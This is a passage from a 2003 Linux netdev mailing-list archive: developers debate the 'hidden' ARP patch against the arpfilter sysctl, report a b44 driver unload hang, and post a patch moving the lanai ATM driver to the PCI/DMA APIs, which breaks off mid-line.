Date: Sun, 27 Jul 2003 21:37:10 -0700 (PDT) Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices In-Reply-To: <20030727175557.1d624b36.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4330 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: david.lang@digitalinsight.com Precedence: bulk X-list: netdev can a summary of this discussion get written and put into the documentation directory so that every time a new person stubles on this feature we don't have to go through this discussion again? David Lang P.S. there are standards that are written documents and there are standards that are 'how everyone does it' for the most part Linux follows both types of standards, in this case the network team has decided to ignore the 'how everyone else does it' standards becouse there is nothing in a written standard that they are violating On Sun, 27 Jul 2003, David S. Miller wrote: > Date: Sun, 27 Jul 2003 17:55:57 -0700 > From: David S. Miller > To: Carlos Velasco > Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, > linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, > linux-kernel@vger.kernel.org > Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices > > On Mon, 28 Jul 2003 02:53:09 +0200 > "Carlos Velasco" wrote: > > > But if the hidden patch and /proc switch would be in the main kernel, > > it would be the simpliest way to solve all these "problems" (with an > > echo "1" and without filtering or using iproute2). > > With or without your suggestion, people have to do something > different. > > This doesn't even address all the problems there are with > the hidden patch. It does things that belong on the netfilter > level and not on the ARP/routing level. > > Again, I'd like you to read all the discussions that have happened on > this topic in the past, in particular those made by Alexey Kuznetsov > on this topic. He gives very clear and concise reasons why the > "hidden" patch is logically doing things in the wrong part of the > kernel, and therefore won't ever be put into the tree. > - > To unsubscribe from this list: send the line "unsubscribe linux-kernel" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html > Please read the FAQ at http://www.tux.org/lkml/ > From davem@redhat.com Sun Jul 27 21:44:33 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 21:44:37 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S4iLFl026768 for ; Sun, 27 Jul 2003 21:44:28 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id VAA27354; Sun, 27 Jul 2003 21:39:57 -0700 Date: Sun, 27 Jul 2003 21:39:56 -0700 From: "David S. Miller" To: David Lang Cc: carlosev@newipnet.com, bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-Id: <20030727213956.6ede8008.davem@redhat.com> In-Reply-To: References: <20030727175557.1d624b36.davem@redhat.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4331 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 27 Jul 2003 21:37:10 -0700 (PDT) David Lang wrote: > P.S. there are standards that are written documents and there are > standards that are 'how everyone does it' for the most part Linux follows > both types of standards, in this case the network team has decided to > ignore the 'how everyone else does it' standards becouse there is nothing > in a written standard that they are violating Keep in mind that we implemented sys_sendfile() with different arguments and semantics than everyone else. From bloemsaa@xs4all.nl Mon Jul 28 00:33:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 00:34:03 -0700 (PDT) Received: from smtpzilla1.xs4all.nl (smtpzilla1.xs4all.nl [194.109.127.137]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S7XqFl005017 for ; Mon, 28 Jul 2003 00:33:53 -0700 Received: from llewella (vialle.xs4all.nl [213.84.6.25]) by smtpzilla1.xs4all.nl (8.12.9/8.12.9) with SMTP id h6S7Xg6a007185; Mon, 28 Jul 2003 09:33:47 +0200 (CEST) Message-ID: <01a601c354da$9710cc10$cd01a8c0@llewella> From: "Bas Bloemsaat" To: "Ben Greear" , "David S. Miller" , "Carlos Velasco" , , References: <20030727151234.6e2aa57e.davem@redhat.com> <3F248AE5.4000204@candelatech.com> Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Date: Mon, 28 Jul 2003 09:33:46 +0200 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1158 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 X-archive-position: 4332 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: bloemsaa@xs4all.nl Precedence: bulk X-list: netdev Hi all, > > Not a bug. This behavior is on purpose. First of all I'm sorry I rubbed some old sores. I didn't know the behaviour was on purpose, and I did google for it. Could have saved my weekend, had I known. > >Bas's problem can be solved by him giving a "preferred source" > >to each of his IPV4 routes and setting the "arpfilter" sysctl > >variable for his devices to "1". > > Yes, it's another approach to solve his problem. But he must play with routing. Routing isn't solving anything here, it's too dynamic. Only one of the devices has a fixed IP, and handles a link to the outside, among others. The other is on DHCP: addresses can change without warning. Both are on the same ethernet segment. I've looked at the hidden patch, and it's capable of doing this right. I do think this has to be solved at the device layer. It's quite counter intuitive the way it is now. My vote goes to hidden. Regards, Bas From cedric.gavage@unixtech.be Mon Jul 28 00:40:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 00:40:53 -0700 (PDT) Received: from virtual.paginaweb.be (virtual.paginaweb.be [212.3.242.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S7eiFl005885 for ; Mon, 28 Jul 2003 00:40:45 -0700 Received: from unixtech.be (warp-core.skynet.be [195.238.24.200]) (authenticated bits=0) by virtual.paginaweb.be (8.12.9/8.12.9/UnixTech - Niddle v2.5 - abuse@unixtech.be) with ESMTP id h6S7eaZk030813; Mon, 28 Jul 2003 09:40:37 +0200 Message-ID: <3F24D31F.5050904@unixtech.be> Date: Mon, 28 Jul 2003 09:39:11 +0200 From: Cedric Gavage User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030714 Debian/1.3.1-3 StumbleUpon/1.73 X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" CC: alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> <20030723024648.2e4b6a62.davem@redhat.com> <3F1E7435.4060308@unixtech.be> <20030727163422.28e44736.davem@redhat.com> In-Reply-To: <20030727163422.28e44736.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4333 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cedric.gavage@unixtech.be Precedence: bulk X-list: netdev David S. Miller wrote: > On Wed, 23 Jul 2003 13:40:37 +0200 > Cedric Gavage wrote: > > >>Ok, now it's e100 driver, I will wait some hours to see if we have again >>problems, thanks for your help. > > > Any problems yet? > It's ok now... I was waiting some hours (days) to see if it was really ok ;) Thanks for your help. -- Cedric Gavage http://unixtech.be - http://gavage.com - OpenPGP: 0xED325C64 From zagarna@yahoo.com Mon Jul 28 02:42:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 02:42:42 -0700 (PDT) Received: from smtp014.mail.yahoo.com (smtp014.mail.yahoo.com [216.136.173.58]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S9gYFl019459 for ; Mon, 28 Jul 2003 02:42:34 -0700 Received: from nat.infrapix.infracom.it (HELO sinbad) (zagarna@193.108.239.34 with login) by smtp.mail.vip.sc5.yahoo.com with SMTP; 28 Jul 2003 09:42:33 -0000 Date: Mon, 28 Jul 2003 11:43:02 +0200 From: Antonio Dolcetta To: pp@ee.oulu.fi Cc: netdev@oss.sgi.com Subject: b44 module problems Message-Id: <20030728114302.1cbb6f70.zagarna@yahoo.com> X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4334 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: zagarna@yahoo.com Precedence: bulk X-list: netdev Hi, I'm having problems with the new b44 module on linux-2.6-test1 patched with the same patch that evenually got into test-2 this is how i can reproduce the problem: 1 ) boot and load the module, don't plug in the ethernet cable 2 ) try to configure the card via dhcp, it times out 3 ) rmmod b44 at this point I get cpu at 90% new istances of lsmod and rmmod hang during execution i get the following kernel events: unregister_netdevice: waiting for eth0 to become free. Usage count = 1 every few seconds, is there any more testing i can do for you? the module works flawlessly otherwise thank you Antonio Dolcetta -- Speaking just for me, I don't think I have Linux blinders on my eyes. I can see other platforms, but I *choose* to ignore them on the theory that if I ignore them hard enough they will go away. This theory is obviously crazy. However, it also appears to be working. -- Eric S. Raymond From pp@ee.oulu.fi Mon Jul 28 02:56:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 02:56:42 -0700 (PDT) Received: from ee.oulu.fi (ee.oulu.fi [130.231.61.23]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S9uZFl020848 for ; Mon, 28 Jul 2003 02:56:36 -0700 Received: from tk1.oulu.fi (tk1 [130.231.48.41]) by ee.oulu.fi (8.12.9/8.12.9) with ESMTP id h6S9uV3G000684; Mon, 28 Jul 2003 12:56:31 +0300 (EEST) Received: (from pp@localhost) by tk1.oulu.fi (8.12.9/8.12.9/Submit) id h6S9uVjx007087; Mon, 28 Jul 2003 12:56:31 +0300 (EEST) Date: Mon, 28 Jul 2003 12:56:31 +0300 From: Pekka Pietikainen To: Antonio Dolcetta Cc: netdev@oss.sgi.com Subject: Re: b44 module problems Message-ID: <20030728095631.GA6946@ee.oulu.fi> References: <20030728114302.1cbb6f70.zagarna@yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-15 Content-Disposition: inline In-Reply-To: <20030728114302.1cbb6f70.zagarna@yahoo.com> User-Agent: Mutt/1.4.1i X-archive-position: 4335 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pp@ee.oulu.fi Precedence: bulk X-list: netdev On Mon, Jul 28, 2003 at 11:43:02AM +0200, Antonio Dolcetta wrote: > 1 ) boot and load the module, don't plug in the ethernet cable > 2 ) try to configure the card via dhcp, it times out > 3 ) rmmod b44 > at this point I get cpu at 90% > new istances of lsmod and rmmod hang during execution > i get the following kernel events: > unregister_netdevice: waiting for eth0 to become free. Usage count = 1 > every few seconds, > is there any more testing i can do for you? > > the module works flawlessly otherwise > thank you Hi You're not trying to use ipv6 or have the module loaded by any chance? When working on the driver I had similar problems with rmmod on 2.5 when the ipv6 module was loaded, without it unloading worked just fine (if I understood correctly, this is a known problem with all ethernet drivers). In any case I'll try reproducing the problem when I get back home. From carlosev@newipnet.com Mon Jul 28 03:44:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 03:44:24 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SAiAFl027705 for ; Mon, 28 Jul 2003 03:44:11 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id ED399207AB; Mon, 28 Jul 2003 12:44:07 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 61F3D20619; Mon, 28 Jul 2003 12:43:50 +0200 (CEST) Message-ID: <200307281243530385.12D80171@192.168.128.16> In-Reply-To: <20030727183547.784b6ab5.davem@redhat.com> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> <200307280235210263.10AADFF8@192.168.128.16> <20030727173600.475d95fb.davem@redhat.com> <200307280253090799.10BB2DF0@192.168.128.16> <20030727175557.1d624b36.davem@redhat.com> <200307280323020667.10D68954@192.168.128.16> <20030727183547.784b6ab5.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Mon, 28 Jul 2003 12:43:53 +0200 From: "Carlos Velasco" To: "David S. Miller" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Content-Type: text/plain; charset="us-ascii" X-archive-position: 4336 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 27/07/2003 at 18:35 David S. Miller wrote: >I don't deny that it fixes your problem, that is not what >we're talking about. We're talking about how one should >fix the problem, and I'm trying to show you why "hidden" >patch is not the answer to that. Yes, and I'm trying to tell you that it's not the only way to solve it, but it is the simpliest way to do it. As I'm sure most of linux users that have steped into this "behaviour" think about it. >Ummm, with "hidden" you still have to make a configuration change. Just enabling it in the /proc switch. It could be done "by default" but as we talked about it in the netdev list, changing the default behaviour of linux when it has been working this way for years is not a good thing. >Second of all, "hidden" makes the kernel behave in a non-RFC compliant >way. This is the categorization that I use to determine if something >belongs on the netfilter level or not. Non-RFC compliant? What RFC is breaking? I don't think the hidden breaks any RFC, aso I don't think the actual behaviour breaks any RFC, but if it would do, it would be the actual one. The actual behaviour of linux makes loopback interfaces no sense. Also, as long as I know, 127.0.0.1 is not answered in ARP, although it's the default address of lo interface. So... there's some filter in the kernel too. >If something changes the way in which the Linux networking >behaves wrt. RFCs, this "operation" belongs at the netfilter level. I think you are wrong, RFCs do not say anything about interfaces. It's decission of the OS how this is to be implemented. >This is true for the "hidden" patch. It causes the system to >ignore ARP requests it should respond to. Not at all, it ignore ARP requests coming from an interface and with destination the IP address of OTHER interface. If there's something wrong, I think this is the wrong behaviour. If we go back to my "problem" setting, linux is doing an ARP request putting in the src IP addreess, the address of the loopback interface, that has no sense on the ethernet inteface, causing Cisco to not reply to this packet (although I think Cisco is failing RFC). >On the other hand, the "arpfilter" sysctl setting makes the kernel >still behave in an RFC compliant manner, it only responds to ARPs >on interfaces it would use to speak to the requestor. I think the hidden patch is also RFC compliant. More, the "hidden" patch makes Linux behave like other OS and systems I have tested. So... you say all these systems are NOT RFC compliant? >> Really, the only one I have tested that not do it is Linux 2.2+ > >Yes, we removed "hidden" from 2.2.x in lieu of "arpfilter" sysctl >and the netfilter ARP filtering module. Being the hidden patch the simpliest approach to solve of these "problems". >> For me (not a kernel developer), my world are the OSI layers, > >OSI layers have nothing to do with the problem we are discussing. > >BTW, OSI layers are how networking stacks are described in textbooks >and standards and far away from how one should implement said stack. >Van Jacobson even said this once :-) As long as I know, the hidden patch does isolation of interfaces at layer 2 (ARP). About isolation of interfaces at layer 3, the forwarding switch in /proc should be used. About the kenel is not the right place to do these things, there are switchs: proxy_arp rp_filter accept_redirects forwarding send_redirects These example switchs modify the behaviour of the linux box in the kernel, without using netfilter. >> I will look... but doing arp filter is not a real simple solution in >> any way. > >It would be really nice if people might consider that it could even be >possible to make things like the IPVS layer install the appropriate >NETFILTER_ARP chain rules when the IPVS configuration installed dictates >that one is needed. > >People using IPVS wouldn't even need to do _ANYTHING_ if IPVS were >to do that. > >And all of that would be _FINE_ because like ARP netfilter, IPVS lies >inside of netfilter where such things which change networking behavior >semantics radically belong. I'm not sure, but IPVS is the Linux Virtual Server? Well... my "problem" setting was not with LVS, I use a Cisco hardware load balancing device. Also, the problem in this setting is not in the load balancing device, it's on the "real servers" that does not use the LVS software at all. Just these servers don't know they are being "balanced". But again, David, LVS is not the only setting that reveal this "problem" with interface isolation. Bas has stepped into the same "problem" in another setting. Also, this "problem" with linux open a minor security hole (see Bas mail), unless you use ARP filter or hidden patch. Regards, Carlos Velasco From carlosev@newipnet.com Mon Jul 28 03:50:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 03:50:10 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SAo4Fl028434 for ; Mon, 28 Jul 2003 03:50:05 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 46DAC20619; Mon, 28 Jul 2003 12:50:01 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 301E2207AB; Mon, 28 Jul 2003 12:49:50 +0200 (CEST) Message-ID: <200307281249530272.12DD7F41@192.168.128.16> In-Reply-To: References: X-Mailer: Calypso Version 3.30.00.00 (4) Date: Mon, 28 Jul 2003 12:49:53 +0200 From: "Carlos Velasco" To: "David Lang" , "David S. Miller" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Content-Type: text/plain; charset="us-ascii" X-archive-position: 4337 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 27/07/2003 at 21:37 David Lang wrote: >P.S. there are standards that are written documents and there are >standards that are 'how everyone does it' for the most part Linux follows >both types of standards, in this case the network team has decided to >ignore the 'how everyone else does it' standards becouse there is nothing >in a written standard that they are violating No problem behaving different. The questions are... What is the advantage of doing it in this case? Why not implementing an easy way to do linux behave like the other OS and systems? Regards, Carlos Velasco From chas@locutus.cmf.nrl.navy.mil Mon Jul 28 06:53:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 06:53:40 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SDrQFl017339 for ; Mon, 28 Jul 2003 06:53:27 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6SDrHsG009681; Mon, 28 Jul 2003 09:53:17 -0400 (EDT) Message-Id: <200307281353.h6SDrHsG009681@ginger.cmf.nrl.navy.mil> To: Mitchell Blank Jr cc: davem@redhat.com, netdev@oss.sgi.com Reply-To: chas3@users.sourceforge.net Subject: Re: [atmdrvr lanai] PATCH: update to modern DMA/PCI api, etc In-reply-to: Your message of "Sun, 27 Jul 2003 21:56:20 PDT." <20030728045620.GJ32831@gaz.sfgoth.com> Date: Mon, 28 Jul 2003 09:50:35 -0400 From: chas williams X-Spam-Score: () hits=-2.9 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4338 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev dave, please apply the following patch from mitch: In message <20030728045620.GJ32831@gaz.sfgoth.com>,Mitchell Blank Jr writes: >This patch updates my lanai driver to use the modern PCI and DMA APIs (along >with a few other trivial things). With this patch the driver should work >on non-i386 platforms - I personally have it working on my sparc64 box now. >Hopefully that means I'll be able to do some ATM work now. > >The patch doesn't remove the MOD_{INC,DEC}_USE_COUNT stuff pending the >mass-conversion of ATM drivers. > >This is versus 2.6.0-test1 but nothing changed in this file for -test2 so it >will apply cleanly. Chas - if this looks ok to you please push it upstream. # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1473.1.2 -> 1.1473.1.3 # drivers/atm/lanai.c 1.10 -> 1.11 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/28 chas@relax.cmf.nrl.navy.mil 1.1473.1.3 # update lanai driver to use the modern PCI and DMA APIs (from mitch@sfgoth.com) # -------------------------------------------- # diff -Nru a/drivers/atm/lanai.c b/drivers/atm/lanai.c --- a/drivers/atm/lanai.c Mon Jul 28 09:51:13 2003 +++ b/drivers/atm/lanai.c Mon Jul 28 09:51:13 2003 @@ -1,4 +1,4 @@ -/* lanai.c -- Copyright 1999 by Mitchell Blank Jr +/* lanai.c -- Copyright 1999-2003 by Mitchell Blank Jr * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License @@ -55,6 +55,7 @@ */ /* Version history: + * v.1.00 -- 26-JUL-2003 -- PCI/DMA updates * v.0.02 -- 11-JAN-2000 -- Endian fixes * v.0.01 -- 30-NOV-1999 -- Initial release */ @@ -178,7 +179,7 @@ printk(KERN_DEBUG DEV_LABEL ": " format, ##args) #define APRINTK(truth, format, args...) \ do { \ - if (!(truth)) \ + if (unlikely(!(truth))) \ printk(KERN_ERR DEV_LABEL ": " format, ##args); \ } while (0) @@ -215,7 +216,7 @@ u32 *start; /* From get_free_pages */ u32 *end; /* One past last byte */ u32 *ptr; /* Pointer to current host location */ - int order; /* log2(size/PAGE_SIZE) */ + dma_addr_t dmaaddr; }; struct lanai_vcc_stats { @@ -373,89 +374,76 @@ /* * Lanai needs DMA buffers aligned to 256 bytes of at least 1024 bytes - - * we assume that any page allocation will do. I'm sure this is - * never going to be a problem, but it's good to document assumtions + * usually any page allocation will do. Just to be safe in case + * PAGE_SIZE is insanely tiny, though... */ -#if PAGE_SIZE < 1024 -#error PAGE_SIZE too small to support LANAI chipset -#endif -/* - * We also assume that the maximum buffer size will be some number - * of whole pages, although that wouldn't be too hard to fix - */ -#if PAGE_SIZE > (128 * 1024) -#error PAGE_SIZE too large to support LANAI chipset -#endif - -/* Convert a size to "order" for __get_free_pages */ -static int bytes_to_order(int bytes) -{ - int order = 0; - if (bytes > (128 * 1024)) - bytes = 128 * 1024; /* Max buffer size for lanai */ - while ((PAGE_SIZE << order) < bytes) - order++; - return order; -} +#define LANAI_PAGE_SIZE ((PAGE_SIZE >= 1024) ? PAGE_SIZE : 1024) /* * Allocate a buffer in host RAM for service list, RX, or TX - * Returns buf->order<0 if no memory - * Note that the size will be rounded up to an "order" of pages, and + * Returns buf->start==NULL if no memory + * Note that the size will be rounded up 2^n bytes, and * if we can't allocate that we'll settle for something smaller * until minbytes - * - * NOTE: buffer must be 32-bit DMA capable - when linux can - * make distinction, this will need tweaking for this - * to work on BIG memory machines. */ static void lanai_buf_allocate(struct lanai_buffer *buf, - int bytes, int minbytes) + size_t bytes, size_t minbytes, struct pci_dev *pci) { - unsigned long address; - int order = bytes_to_order(bytes); + int size; + + if (bytes > (128 * 1024)) /* max lanai buffer size */ + bytes = 128 * 1024; + for (size = LANAI_PAGE_SIZE; size < bytes; size *= 2) + ; + if (minbytes < LANAI_PAGE_SIZE) + minbytes = LANAI_PAGE_SIZE; do { - address = __get_free_pages(GFP_KERNEL, order); - if (address != 0) { /* Success */ - bytes = PAGE_SIZE << order; - buf->start = buf->ptr = (u32 *) address; - buf->end = (u32 *) (address + bytes); - memset((void *) address, 0, bytes); + /* + * Technically we could use non-consistent mappings for + * everything, but the way the lanai uses DMA memory would + * make that a terrific pain. This is much simpler. + */ + buf->start = pci_alloc_consistent(pci, size, &buf->dmaaddr); + if (buf->start != NULL) { /* Success */ + /* Lanai requires 256-byte alignment of DMA bufs */ + APRINTK((buf->dmaaddr & ~0xFFFFFF00) == 0, + "bad dmaaddr: 0x%lx\n", + (unsigned long) buf->dmaaddr); + buf->ptr = buf->start; + buf->end = (u32 *) + (&((unsigned char *) buf->start)[size]); + memset(buf->start, 0, size); break; } - if ((PAGE_SIZE << --order) < minbytes) - order = -1; /* Too small - give up */ - } while (order >= 0); - buf->order = order; -} - -static inline void lanai_buf_deallocate(struct lanai_buffer *buf) -{ - if (buf->order >= 0) { - APRINTK(buf->start != 0, "lanai_buf_deallocate: start==0!\n"); - free_pages((unsigned long) buf->start, buf->order); - buf->start = buf->end = buf->ptr = 0; - } + size /= 2; + } while (size >= minbytes); } /* size of buffer in bytes */ -static inline int lanai_buf_size(const struct lanai_buffer *buf) +static inline size_t lanai_buf_size(const struct lanai_buffer *buf) { return ((unsigned long) buf->end) - ((unsigned long) buf->start); } -/* size of buffer as "card order" (0=1k .. 7=128k) */ -static inline int lanai_buf_size_cardorder(const struct lanai_buffer *buf) +static void lanai_buf_deallocate(struct lanai_buffer *buf, + struct pci_dev *pci) { - return buf->order + PAGE_SHIFT - 10; + if (buf->start != NULL) { + pci_free_consistent(pci, lanai_buf_size(buf), + buf->start, buf->dmaaddr); + buf->start = buf->end = buf->ptr = NULL; + } } -/* DMA-able address for this buffer */ -static unsigned long lanai_buf_dmaaddr(const struct lanai_buffer *buf) +/* size of buffer as "card order" (0=1k .. 7=128k) */ +static int lanai_buf_size_cardorder(const struct lanai_buffer *buf) { - unsigned long r = virt_to_bus(buf->start); - APRINTK((r & ~0xFFFFFF00) == 0, "bad dmaaddr: 0x%lx\n", (long) r); - return r; + int order = get_order(lanai_buf_size(buf)) + (PAGE_SHIFT - 10); + + /* This can only happen if PAGE_SIZE is gigantic, but just in case */ + if (order > 7) + order = 7; + return order; } /* -------------------- HANDLE BACKLOG_VCCS BITFIELD: */ @@ -492,7 +480,7 @@ Reset_Reg = 0x00, /* Reset; read for chip type; bits: */ #define RESET_GET_BOARD_REV(x) (((x)>> 0)&0x03) /* Board revision */ #define RESET_GET_BOARD_ID(x) (((x)>> 2)&0x03) /* Board ID */ -#define BOARD_ID_LANAI256 (0) /* 25.6M adaptor card */ +#define BOARD_ID_LANAI256 (0) /* 25.6M adapter card */ Endian_Reg = 0x04, /* Endian setting */ IntStatus_Reg = 0x08, /* Interrupt status */ IntStatusMasked_Reg = 0x0C, /* Interrupt status (masked) */ @@ -850,7 +838,7 @@ { u32 addr1; if (lvcc->rx.atmvcc->qos.aal == ATM_AAL5) { - unsigned long dmaaddr = lanai_buf_dmaaddr(&lvcc->rx.buf); + dma_addr_t dmaaddr = lvcc->rx.buf.dmaaddr; cardvcc_write(lvcc, 0xFFFF, vcc_rxcrc1); cardvcc_write(lvcc, 0xFFFF, vcc_rxcrc2); cardvcc_write(lvcc, 0, vcc_rxwriteptr); @@ -872,7 +860,7 @@ static void host_vcc_start_tx(const struct lanai_vcc *lvcc) { - unsigned long dmaaddr = lanai_buf_dmaaddr(&lvcc->tx.buf); + dma_addr_t dmaaddr = lvcc->tx.buf.dmaaddr; cardvcc_write(lvcc, 0, vcc_txicg); cardvcc_write(lvcc, 0xFFFF, vcc_txcrc1); cardvcc_write(lvcc, 0xFFFF, vcc_txcrc2); @@ -971,14 +959,15 @@ static inline int aal0_buffer_allocate(struct lanai_dev *lanai) { DPRINTK("aal0_buffer_allocate: allocating AAL0 RX buffer\n"); - lanai_buf_allocate(&lanai->aal0buf, AAL0_RX_BUFFER_SIZE, 80); - return (lanai->aal0buf.order < 0) ? -ENOMEM : 0; + lanai_buf_allocate(&lanai->aal0buf, AAL0_RX_BUFFER_SIZE, 80, + lanai->pci); + return (lanai->aal0buf.start == NULL) ? -ENOMEM : 0; } static inline void aal0_buffer_free(struct lanai_dev *lanai) { DPRINTK("aal0_buffer_allocate: freeing AAL0 RX buffer\n"); - lanai_buf_deallocate(&lanai->aal0buf); + lanai_buf_deallocate(&lanai->aal0buf, lanai->pci); } /* -------------------- EEPROM UTILITIES: */ @@ -1678,36 +1667,37 @@ return lvcc; } -static int lanai_get_sized_buffer(int number, struct lanai_buffer *buf, - int max_sdu, int multiplier, int min, const char *name) +static int lanai_get_sized_buffer(struct lanai_dev *lanai, + struct lanai_buffer *buf, int max_sdu, int multiplier, + int min, const char *name) { int size; if (max_sdu < 1) max_sdu = 1; max_sdu = aal5_size(max_sdu); size = (max_sdu + 16) * multiplier + 16; - lanai_buf_allocate(buf, size, min); - if (buf->order < 0) + lanai_buf_allocate(buf, size, min, lanai->pci); + if (buf->start == NULL) return -ENOMEM; if (lanai_buf_size(buf) < size) printk(KERN_WARNING DEV_LABEL "(itf %d): wanted %d bytes " - "for %s buffer, got only %d\n", number, size, name, + "for %s buffer, got only %d\n", lanai->number, size, name, lanai_buf_size(buf)); DPRINTK("Allocated %d byte %s buffer\n", lanai_buf_size(buf), name); return 0; } /* Setup a RX buffer for a currently unbound AAL5 vci */ -static inline int lanai_setup_rx_vci_aal5(int number, struct lanai_vcc *lvcc, - const struct atm_qos *qos) +static inline int lanai_setup_rx_vci_aal5(struct lanai_dev *lanai, + struct lanai_vcc *lvcc, const struct atm_qos *qos) { - return lanai_get_sized_buffer(number, &lvcc->rx.buf, + return 